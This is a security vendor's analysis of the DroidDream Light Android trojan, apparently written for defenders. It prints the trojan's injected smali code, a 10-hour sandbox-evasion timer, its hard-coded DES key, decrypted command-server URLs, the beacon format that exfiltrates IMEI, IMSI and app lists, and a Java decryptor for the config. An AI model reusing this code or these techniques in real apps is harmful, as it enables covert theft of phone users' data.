A few days ago, Lookout released an article on their blog about a newly discovered Android malware, created by the same author who uploaded the "DroidDream" malware disclosed this March. AegisLab also investigated the samples in our hands and composed the following analysis. [We use the sample named "Quick Cleaner" as the example.]

     DroidDream Light repackages popular applications with its malicious code (com.passionteam.lightdd), called "ddlight" for short below. "ddlight" adds a receiver and a service that execute its malicious code, which collects information about the user's mobile device and sends it to a remote server.

        <receiver android:name="com.passionteam.lightdd.Receiver">
            <intent-filter>
                <action android:name="android.intent.action.PHONE_STATE" />
                <category android:name="android.intent.category.DEFAULT" />
            </intent-filter>
        </receiver>
        <service android:name="com.passionteam.lightdd.CoreService" />


    To activate its code and collect privileged user data, it needs the additional permissions below.

        <uses-permission android:name="android.permission.INTERNET" />
        <uses-permission android:name="android.permission.READ_PHONE_STATE" />


    "ddlight" starts CoreService to collect the user's privileged information when the user starts the repackaged application or when a phone call comes in. However, ddlight does not run its malicious code right away: it uses a timer to wait 10 hours, then sends data repeatedly at a period of around 2 hours.


    The first method: cn/com/opda/android/clearmaster/MainTabActivity.smali (the application's entry point is modified)

.method protected onCreate(Landroid/os/Bundle;)V
    .locals 7
    .parameter "savedInstanceState"

    .prologue
    .line 49
    invoke-super {p0, p1}, Landroid/app/TabActivity;->onCreate(Landroid/os/Bundle;)V

    # injected by ddlight: start CoreService before the original application code runs
    new-instance v0, Landroid/content/Intent;

    const-class v1, Lcom/passionteam/lightdd/CoreService;

    invoke-direct {v0, p0, v1}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V

    invoke-virtual {p0, v0}, Lcn/com/opda/android/clearmaster/MainTabActivity;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;

    .line 50
    invoke-static {p0}, Lcom/mobclick/android/MobclickAgent;->onError(Landroid/content/Context;)V


    The second method: com/passionteam/lightdd/Receiver.smali (when a phone call comes in)

# virtual methods
.method public onReceive(Landroid/content/Context;Landroid/content/Intent;)V
    .locals 4

    iput-object p1, p0, Lcom/passionteam/lightdd/Receiver;->a:Landroid/content/Context;

    invoke-virtual {p2}, Landroid/content/Intent;->getAction()Ljava/lang/String;

    move-result-object v0

    # only react to the PHONE_STATE broadcast declared in the manifest intent-filter
    const-string v1, "android.intent.action.PHONE_STATE"

    invoke-virtual {v0, v1}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z

    move-result v0

    if-eqz v0, :cond_0

    iget-object v0, p0, Lcom/passionteam/lightdd/Receiver;->a:Landroid/content/Context;

    new-instance v1, Landroid/content/Intent;

    iget-object v2, p0, Lcom/passionteam/lightdd/Receiver;->a:Landroid/content/Context;

    const-class v3, Lcom/passionteam/lightdd/CoreService;

    invoke-direct {v1, v2, v3}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V

    invoke-virtual {v0, v1}, Landroid/content/Context;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;

    :cond_0
    return-void
.end method




    com/passionteam/lightdd/CoreService.smali: CoreService sets a timer before running its code, which makes it harder to catch with dynamic analysis (a sandbox that runs the sample for only a few minutes never sees the data being sent).

# direct methods
.method public constructor <init>()V
    .locals 1

    invoke-direct {p0}, Landroid/app/Service;-><init>()V

    new-instance v0, Lcom/passionteam/lightdd/d;

    invoke-direct {v0, p0}, Lcom/passionteam/lightdd/d;-><init>(Lcom/passionteam/lightdd/CoreService;)V

    iput-object v0, p0, Lcom/passionteam/lightdd/CoreService;->a:Landroid/os/Handler;

# TimerTask subclass
    new-instance v0, Lcom/passionteam/lightdd/a;

    invoke-direct {v0, p0}, Lcom/passionteam/lightdd/a;-><init>(Lcom/passionteam/lightdd/CoreService;)V

    iput-object v0, p0, Lcom/passionteam/lightdd/CoreService;->i:Ljava/util/TimerTask;

    return-void
.end method

.method public onCreate()V
    ...
    invoke-direct {v0}, Ljava/util/Timer;-><init>()V

    iget-object v1, p0, Lcom/passionteam/lightdd/CoreService;->i:Ljava/util/TimerTask;

    # 0xa = 10 (hours)
    const/16 v2, 0xa
    # delay: 36,000,000 ms = 10 hours
    invoke-static {v6, v2}, Lcom/passionteam/lightdd/g;->a(II)J

    move-result-wide v2

    const/4 v4, 0x2

    # period: 7,200,000 ms = 2 hours
    invoke-static {v4, v6}, Lcom/passionteam/lightdd/g;->a(II)J

    move-result-wide v4

    # Timer.schedule(task, delay, period): first run after 10 hours, then every 2 hours
    invoke-virtual/range {v0 .. v5}, Ljava/util/Timer;->schedule(Ljava/util/TimerTask;JJ)V

    ...


    com/passionteam/lightdd/c.smali: all the data it stores and sends is encrypted with DES using a hard-coded key, as below.

.method public static a([B)[B
    .locals 4

    const-string v3, "DES"

    new-instance v0, Ljava/security/SecureRandom;

    invoke-direct {v0}, Ljava/security/SecureRandom;-><init>()V

    new-instance v1, Ljavax/crypto/spec/DESKeySpec;
# DES key
    const-string v2, "DDH#X%LT"

    invoke-virtual {v2}, Ljava/lang/String;->getBytes()[B

    move-result-object v2

    invoke-direct {v1, v2}, Ljavax/crypto/spec/DESKeySpec;-><init>([B)V

    const-string v2, "DES"

    invoke-static {v3}, Ljavax/crypto/SecretKeyFactory;->getInstance(Ljava/lang/String;)Ljavax/crypto/SecretKeyFactory;

    move-result-object v2

    invoke-virtual {v2, v1}, Ljavax/crypto/SecretKeyFactory;->generateSecret(Ljava/security/spec/KeySpec;)Ljavax/crypto/SecretKey;

    move-result-object v1

    const-string v2, "DES"

    invoke-static {v3}, Ljavax/crypto/Cipher;->getInstance(Ljava/lang/String;)Ljavax/crypto/Cipher;


    "ddlight" carries a resource file "prefer.dat" that records the web sites it randomly picks from when sending the encrypted data.

Encrypted (prefer.dat as stored in the APK):
0000000: dc8d 5f0c 07d7 9d09 6335 7e32 3f3f 163f  .._.....c5~2??.?
0000010: 373f 3f3f 3f3f 3f7a 0d3f 3f6c 3f56 573f  7??????z.??l?VW?
0000020: 3f3f 3f3f 3f49 463f 7143 773f 3f3f 3f00  ?????IF?qCw????.
0000030: 3f44 743f 3fc7 a13f 483f 6137 3f1f 7775  ?Dt??..?H?a7?.wu
0000040: 553f 3f77 3f34 3f04 c0a3 1e3f 713f 42de  U??w?4?....?q?B.
0000050: a005 6c3f 3f60 0558 3a3f ef9a 973f 2f3f  ..l??`.X:?...?/?
0000060: 763f 683f 7c44 3f3f 3f3f 3f0e 243f 3f3f  v?h?|D?????.$???
0000070: 0a
After decryption:
FeedProxy2=http://ju5o.com/zpmq.jsp
FeedProxy2=http://mlo6.com/owxnf.jsp
FeedProxy2=http://ya3k.com/bksy.jsp


    The privileged information of the infected mobile is transferred as DES-encrypted XML, using the same key "DDH#X%LT". The plain text is shown below; for readability we replaced each element that is not hard-coded with the Android system API the value is read from.

<?xml version="1.0" encoding="UTF-8"?>
<Request>
    <Protocol>2.0</Protocol>
    <Command>2</Command>
    <MobileInfo>
        <Model>Landroid/os/Build;->DEVICE</Model>
        <Language>Ljava/util/Locale;->getDefault();->getLanguage()</Language>
        <Country>Ljava/util/Locale;->getDefault();->getCountry()</Country>
        <IMEI>Landroid/telephony/TelephonyManager;->getDeviceId()</IMEI>
        <IMSI>Landroid/telephony/TelephonyManager;->getSubscriberId()</IMSI>
    </MobileInfo>
    <ClientInfo>
        <PlatformID>5</PlatformID>
        <OSVersion>Landroid/os/Build$VERSION;->SDK_INT</OSVersion>
        <Edition>Landroid/content/pm/PackageInfo;->versionCode</Edition>
        <ProductID>1105201</ProductID>
        <SubCoopID>1100800101</SubCoopID>
        <PackageName>Landroid/content/Context;->getPackageName()</PackageName>
    </ClientInfo>
    <InstalledProductInfo>
        <Product name="Landroid/content/pm/ApplicationInfo;->loadLabel(...)" package="Landroid/content/pm/PackageInfo;->packageName" ver="Landroid/content/pm/PackageInfo;->versionCode" />
        ...
    </InstalledProductInfo>
</Request>
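The following is an added example, not AegisLab's analysis code and not the malware's own source: a readable Java equivalent of the obfuscated c.a([B)[B routine above, used here to decrypt a prefer.dat blob and pull out the FeedProxy2 URLs (the same decrypt call applies to the Request XML beacon). The algorithm name "DES" and the key "DDH#X%LT" come from the smali; the sample config bytes and the hostnames in it are constructed placeholders.

```java
import java.nio.charset.StandardCharsets;
import java.security.GeneralSecurityException;
import java.util.ArrayList;
import java.util.List;
import javax.crypto.Cipher;
import javax.crypto.SecretKey;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.DESKeySpec;

public class DdlightDes {
    // Hard-coded 8-byte key recovered from com/passionteam/lightdd/c.smali
    private static final byte[] KEY = "DDH#X%LT".getBytes(StandardCharsets.US_ASCII);

    // Same object chain as the smali: DESKeySpec -> SecretKeyFactory("DES") -> Cipher. The bare "DES"
    // transformation resolves to DES/ECB/PKCS5Padding on the default JCE and Android providers;
    // it is spelled out here so the result does not depend on the provider.
    private static Cipher desCipher(int mode) throws GeneralSecurityException {
        SecretKey key = SecretKeyFactory.getInstance("DES").generateSecret(new DESKeySpec(KEY));
        Cipher cipher = Cipher.getInstance("DES/ECB/PKCS5Padding");
        cipher.init(mode, key);
        return cipher;
    }
    // The listing above is cut off before Cipher.init, so the mode is not visible there;
    // encryption and decryption share the same setup.
    public static byte[] decrypt(byte[] data) throws GeneralSecurityException {
        return desCipher(Cipher.DECRYPT_MODE).doFinal(data);
    }

    public static byte[] encrypt(byte[] data) throws GeneralSecurityException {
        return desCipher(Cipher.ENCRYPT_MODE).doFinal(data);
    }

    // Decrypted prefer.dat holds one "FeedProxy2=<url>" entry per line; collect the URLs.
    public static List<String> parseFeedProxies(String plain) {
        List<String> urls = new ArrayList<>();
        for (String line : plain.split("\\r?\\n")) {
            String entry = line.trim();
            if (entry.startsWith("FeedProxy2=")) urls.add(entry.substring("FeedProxy2=".length()));
        }
        return urls;
    }

    public static void main(String[] args) throws GeneralSecurityException {
        // Constructed stand-in for prefer.dat; in practice read the bytes from the APK's resources.
        String config = "FeedProxy2=http://c2-placeholder-1.example/a.jsp\n"
                      + "FeedProxy2=http://c2-placeholder-2.example/b.jsp\n";
        byte[] blob = encrypt(config.getBytes(StandardCharsets.UTF_8));
        String plain = new String(decrypt(blob), StandardCharsets.UTF_8);
        for (String url : parseFeedProxies(plain)) System.out.println("C2 candidate: " + url);
    }
}
```

Swap the constructed config for the real prefer.dat bytes, or for a captured beacon body, to recover the live server list for blocklisting and network detection.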

By AegisLab